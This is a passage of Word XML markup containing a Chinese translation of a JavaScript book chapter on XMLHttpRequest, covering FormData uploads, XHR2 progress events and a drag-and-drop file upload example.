        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var formdata=new FormData();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var name in data){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!data.hasOwnProperty(name))continu</w:t>
      </w:r>
      <w:r>
        <w:t>e;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过继承的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=data[name];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof value==="function")continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每个属性变成请求的一个部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里允许</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>formdata.append(name,value);//</w:t>
      </w:r>
      <w:r>
        <w:t>作为一部分添加名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>multipart/form-data</w:t>
      </w:r>
      <w:r>
        <w:t>请求主体中发送名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每对都是请求的一个部分，注意，当传入</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>对象时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//send()</w:t>
      </w:r>
      <w:r>
        <w:t>会自动设置</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.sen</w:t>
      </w:r>
      <w:r>
        <w:t>d(formdata);</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55" w:name="18_1_4_HTTPJin_Du_Shi_Jian_"/>
      <w:r>
        <w:t>18.1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>进度事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在之前的示例中，使用</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件探测</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的完成。</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>规范草案定义了更多有用的事件集，有些已经在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>中得到支持。在这个新的事件模型中，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象在请求的不同阶段触发不同类型的事件，所以它不再需要检查</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在支持它们的浏览器中，这些新事件会像如下这样触发。当调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>时，触发单个</w:t>
      </w:r>
      <w:r>
        <w:t>loadstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当正在加载服务器的响应时，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象会发生</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件，通常每隔</w:t>
      </w:r>
      <w:r>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒左右，所以可以使用这些事件给用户反馈请求的进度。如果请求快速</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>完成，它可能从不会触发</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当事件完成，会触发</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个完成的请求不一定是成功的请求，例如，</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序应该检查</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>sta tus</w:t>
      </w:r>
      <w:r>
        <w:t>状态码来确定收到的是</w:t>
      </w:r>
      <w:r>
        <w:t>"200 OK"</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Not Found"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求无法完成有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>种情况，对应</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>种事件。如果请求超时，会触发</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>事件。如果请求中止，会触发</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件。（</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.5</w:t>
      </w:r>
      <w:r>
        <w:t>节包含超时和</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>方法的内容。）最后，像太多重定向这样的网络错误会阻止请求完成，但这些情况发生时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于任何具体请求，浏览器将只会触发</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件中的一个。</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>规范草案指出一旦这些事件中的一个发生后，浏览器应该触发</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。但在写本章时，尚未有浏览器实现</w:t>
      </w:r>
      <w:r>
        <w:t>lo</w:t>
      </w:r>
      <w:r>
        <w:t>adend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法为这些</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件中的每个都注册处理程序。如果每种事件只有一个事件处理程序，通常更容易的方法是只设置对应的处理程序属性，比如</w:t>
      </w:r>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>。甚至可以使用这些事件属性是否存在来测试浏览器是否支持</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if("onprogress"in(new XMLHttpRequest())){//</w:t>
      </w:r>
      <w:r>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件</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除了像</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r>
        <w:t>这样常用的</w:t>
      </w:r>
      <w:r>
        <w:t>Ev</w:t>
      </w:r>
      <w:r>
        <w:t>ent</w:t>
      </w:r>
      <w:r>
        <w:t>对象属性外，与这些</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件相关联的事件对象还有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个有用的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>loaded</w:t>
      </w:r>
      <w:r>
        <w:t>属性是目前传输的字节数值。</w:t>
      </w:r>
      <w:r>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:t>属性是自</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Length"</w:t>
      </w:r>
      <w:r>
        <w:t>头传输的数据的整体长度（单位是字节），如果不知道内容长度则为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。最后，如果知道内容长度则</w:t>
      </w:r>
      <w:r>
        <w:t>lengthComputable</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。显然，</w:t>
      </w:r>
      <w:r>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>loaded</w:t>
      </w:r>
      <w:r>
        <w:t>属性对</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序相当有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onprogress=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.lengthComputable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>rogress.innerHTML=Math.round(100*e.loaded/e.total)+"%Complete";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>上传进度事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了为监控</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应的加载定义的这些有用的事件外，</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>也给出了用于监控</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求上传的事件。在实现这些特性的浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象将有</w:t>
      </w:r>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:t>属性值是一个对象，它定义了</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和整个</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件集合，比如</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>onprogress</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>。（但</w:t>
      </w:r>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:t>对象没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>nreadystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:t>仅能触发新的事件类型。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>你能仅仅像使用常见的</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序一样使用</w:t>
      </w:r>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。对于</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，设置</w:t>
      </w:r>
      <w:r>
        <w:t>x.onprogress</w:t>
      </w:r>
      <w:r>
        <w:t>以监控响应的下载进度，并且设置</w:t>
      </w:r>
      <w:r>
        <w:t>x.upload.onprogress</w:t>
      </w:r>
      <w:r>
        <w:t>以监控请求的上传进度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-11</w:t>
      </w:r>
      <w:r>
        <w:t>演示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>upload progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件把上传进度反馈给用户。这个示例也演示了如何从拖放</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中获得</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象和如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>FormData API</w:t>
      </w:r>
      <w:r>
        <w:t>在单个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpReq</w:t>
      </w:r>
      <w:r>
        <w:t>uest</w:t>
      </w:r>
      <w:r>
        <w:t>请求中上传多个文件。在写本书时，这些功能依旧在草案中，并且这些示例不能在所有的浏览器中工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-11</w:t>
      </w:r>
      <w:r>
        <w:t>：监控</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>上传进度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找所有含有</w:t>
      </w:r>
      <w:r>
        <w:t>"fileDropTarget"</w:t>
      </w:r>
      <w:r>
        <w:t>类的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并注册</w:t>
      </w:r>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序使它们能响应文件的拖放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当文件放下时，上传它们到</w:t>
      </w:r>
      <w:r>
        <w:t>data-uploadto</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>whenReady(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elts=document.getElementsByClassName("fileDropTarget");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>elts.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var target=elts[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=target.getAttribute("data-uploadto");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!url)continue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>createFileUploadDropTarget(target,url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function createFileUploadDropTarget(target,url){//</w:t>
      </w:r>
      <w:r>
        <w:t>跟踪当前是否正在上传，因此我们能拒绝放下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们可以处理多个并发上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但对这个例子使用进度通知太困难了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>uploading=false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(target,url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.ondragenter=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("dragenter");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(uploading)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果正在忙，忽略拖放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var types=e.dataTransfer.types;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(types</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>((types.contains</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>types.contains("Files"))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(types.indexOf</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>types.indexOf("File</w:t>
      </w:r>
      <w:r>
        <w:t>s")!==-1))){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.classList.add("wantdrop");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.ondragover=function(e){if(!uploading)return false;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.ondragleave=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!uploading)target.classList.remove("wantdrop");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
